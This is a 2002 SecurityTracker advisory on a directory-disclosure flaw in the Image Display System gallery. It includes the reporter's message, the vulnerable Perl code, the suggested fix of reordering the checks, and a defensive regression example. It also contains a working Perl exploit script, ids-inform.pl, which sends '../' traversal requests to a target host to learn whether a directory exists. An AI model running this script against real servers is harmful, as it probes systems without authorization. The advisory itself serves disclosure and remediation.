Category:  Application (Generic)  >  Image Display System (IDS)
Vendors:  ids.sourceforge.net
Image Display System (IDS) CGI Script Discloses Information About Existing Directories to Remote Users
SecurityTracker Alert ID:  1004396
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 29 2002
Impact:  Disclosure of system information
Exploit Included:  Yes  
Version(s): 0.8x
Description:  An information disclosure vulnerability was reported in the Image Display System (IDS) thumbnail gallery software. A remote user can determine if specified directories exist on the server.

A remote user can reportedly submit a URL request specifying any directory on the server via the 'album' variable to determine if the specified directory exists on the server. Apparently, any directory can be specified, but it must be specified using directory traversal strings ('../'). The flaw resides in the idsShared.pm::getAlbumToDisplay() function.

A demonstration exploit script is included in the Source Message.

According to the report, the same vulnerability also exists in the 'index.cgi' script.

Impact:  A remote user can determine whether arbitrary directories exist on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  ids.sourceforge.net/
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  isox@chainsawbeer.com
Message History:   None.


 Source Message Contents

Date:  28 May 2002 20:21:20 -0000
From:  isox@chainsawbeer.com
Subject:  Information Disclosure Vulnerability in IDS 0.8x

 

Hello,

There is an information disclosure vulnerability in IDS 0.8x (assume other versions vulnerable).
IDS is used as a CGI-based image thumbnail gallery.  When an attacker sends the variable album 
a traversed directory (i.e. /../../../../home/foobar) it is possible to tell if the specified 
directory exists by examining the returned error page.  This is possible due to the following 
snippet of code: 


idsShared.pm::getAlbumToDisplay()
=================================
    if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
        bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
    }
    if ($albumtodisplay =~ /\.\./) { # hax0r protection...
        bail ("Sorry, invalid directory name: $!");
    }

Attached below is a working exploit for this vulnerability.  The fix is simple, just flip the if
statements around so it checks for ..'s first.

Also note there is the same type of information disclosure vulnerability in index.cgi via the
following code (I have just not verified if it is exploitable, although it obviously seems as
though it is):

index.cgi::processData()
========================
    if ($mode eq 'image') {
        getAlbumToDisplay();
        $imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");
        unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
            bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
        }
    }
    if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
        bail ("Directory/image paths must not include \"../\".");
    }

Have a good one,
isox

<--- Begin Exploit Code --->
#!/usr/bin/perl -w
# ids-inform.pl (05/27/2002)
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
# By: isox [isox@chainsawbeer.com]
# usage: self explanitory
# my spelling: bad
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.

#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net

#################
# Advertisement #
#################
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;

sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}

sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => $port,
    Timeout  => 8,
    Proto    => 'tcp'
  );

  if(!$sock) {
    die("sock: timed out\n");
  }

  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}
<-- EOF -->
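
The check ordering described in the report, and the reordering it suggests, shown side by side as an added example (this is not code from IDS or from the original message). The temporary directory layout and the `check_vulnerable` / `check_fixed` helpers are constructed for illustration; the error strings mirror the quoted idsShared.pm snippet.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# Constructed layout: <root>/ids/albums/holiday plus a sibling <root>/private
my $root  = tempdir(CLEANUP => 1);
my $ppath = "$root/ids/";
make_path("${ppath}albums/holiday", "$root/private");

# Order used in the quoted idsShared.pm snippet: existence test first, so the
# error message depends on whether the traversed path exists on disk.
sub check_vulnerable {
    my ($album) = @_;
    if ($album ne '/' && !-e $ppath . "albums/$album") {
        return "Sorry, the album \"$album\" doesn't exist";
    }
    if ($album =~ /\.\./) {
        return "Sorry, invalid directory name";
    }
    return "OK";
}

# Order suggested in the report: reject '..' before touching the filesystem,
# so every traversal attempt gets the same answer.
sub check_fixed {
    my ($album) = @_;
    if ($album =~ /\.\./) {
        return "Sorry, invalid directory name";
    }
    if ($album ne '/' && !-e $ppath . "albums/$album") {
        return "Sorry, the album \"$album\" doesn't exist";
    }
    return "OK";
}

# Constructed inputs: a valid album, an existing and a missing outside directory.
for my $album ('holiday', '/../../private', '/../../missing') {
    printf "%-16s vulnerable: %-50s fixed: %s\n",
        $album, check_vulnerable($album), check_fixed($album);
}

# Regression check: the old order answers differently for the two traversal
# inputs, the fixed order must not.
die "vulnerable order unexpectedly uniform\n"
    if check_vulnerable('/../../private') eq check_vulnerable('/../../missing');
die "oracle still present in fixed order\n"
    unless check_fixed('/../../private') eq check_fixed('/../../missing');
```

The same ordering applies to the index.cgi snippet, where the `-e` test on the image path also runs before the `..` check.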



Copyright 2002, SecurityGlobal.net LLC